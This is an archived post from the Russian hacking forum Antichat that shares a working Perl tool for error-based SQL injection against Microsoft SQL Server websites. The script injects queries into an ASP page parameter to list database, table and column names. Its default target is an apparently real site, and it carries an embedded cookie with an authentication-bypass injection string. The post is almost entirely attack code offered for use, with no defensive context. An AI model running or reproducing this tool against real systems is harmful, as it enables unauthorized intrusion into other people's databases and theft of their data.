Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
MSSQL Database Scanner for SQL Injection |
24.04.2008, 21:37
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
MSSQL Database Scanner for SQL Injection
Код:
#!/usr/bin/perl
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwtdi');
$host=$opt_h || "www.vod999.com";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
#############################################################
#this is debug flag;
$debug = 0;
#this is cookie info
$cookie = "cookie: ASPSESSIONIDCASCBSBQ=JMOEIMPBLNBBGIPICGDIDECN; iscookies=0; BoardList=BoardID=Show; popped=yes; upNum=0; userinfo=bw%5Fu=1%27+or+%271%27%3D%271%27%3B%2D%2D; VisitNum=1";
#############################################################
usage();
if($type eq "table_scan")
{
scan_db();
print "\nDatabase name scan complete!\n===================================\n";
foreach (@sqldb)
{
print "$_\n";
}
print "===================================\n";
scan_table(@sqldb);
for($i=0;$i<@sqldb;$i++)
{
print "\n\n============== $sqldb[$i] ==============\n\n";
@tb=split(/\n/,$table_name[$i]);
@tbid=split(/\n/,$table_id[$i]);
for($j=0;$j<@tb;$j++)
{
print "| $tb[$j]($tbid[$j])\t";
}
}
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
scan_columns($database,$tab_id);
print "\n============== $database.dbo.$tab_id ==============\n\n";
foreach (@columns)
{
print "| $_\t";
}
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
sub scan_db()
{
my $i=7;
my $req,$get;
my $db=1;
my @res;
while($db ne "not found")
{
$get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i);--";
$req=make_request($get);
@res=sendraw($req);
$db=findstr(@res);
if($db ne "not found")
{
@sqldb=(@sqldb,$db);
}
$i++;
}
}
sub findstr
{
my @tmpres=@_;
my $tmpline;
my $s1,$s2,$s3;
if($debug == 1)
{
print @tmpres;
}
foreach $tmpline (@tmpres)
{
if($tmpline=~/char.*int/isg)
{
$s1=0;
$s2=0;
$s3=0;
($s1,$s2,$s3)=split(/\'/,$tmpline);
$s2=~s/ //isg;
print ".";
if(length($s2) > 1)
{
return $s2;
}
}
}
return "not found";
}
sub scan_table
{
my @db=@_;
my $req,$get;
my $table=1;
my @res;
my $tmpstr1;
my $i=0;
my $tableid;
foreach $db_name (@db)
{
$tmpstr1="";
$table=1;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U');--";
$req=make_request($get);
@res=sendraw($req);
$table=findstr(@res);
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
$req=make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
$tmpstr1="'$table'";
while($table ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($tmpstr1));--";
$req=make_request($get);
@res=sendraw($req);
$table=findstr(@res);
if($table ne "not found")
{
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)));--";
$req=make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
}
$tmpstr1=$tmpstr1.",'$table'";
}
print "\nDatabase \"$db_name\" scan complete!\n";
$i++;
}
}
sub scan_columns
{
my $this_db_name=shift;
my $this_table_id=shift;
my $get,$req,$tmpstr;
my @res;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id);--";
$req=make_request($get);
@res=sendraw($req);
$column=findstr(@res);
@columns=(@columns,$column);
$tmpstr="'$column'";
while($column ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr));--";
$req=make_request($get);
@res=sendraw($req);
$column=findstr(@res);
if($column ne "not found")
{
@columns=(@columns,$column);
$tmpstr=$tmpstr.",'$column'";
}
}
}
sub make_request
{
my $getstr=shift;
my $reqstr;
$reqstr="GET $getstr HTTP/1.0\r\n".
"HOST:$host\r\n".
$cookie."\r\n\r\n";
return $reqstr;
}
sub usage
{
print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Net Tools 5
|
Pernat1y |
Soft - Windows |
2 |
08.02.2008 18:31 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид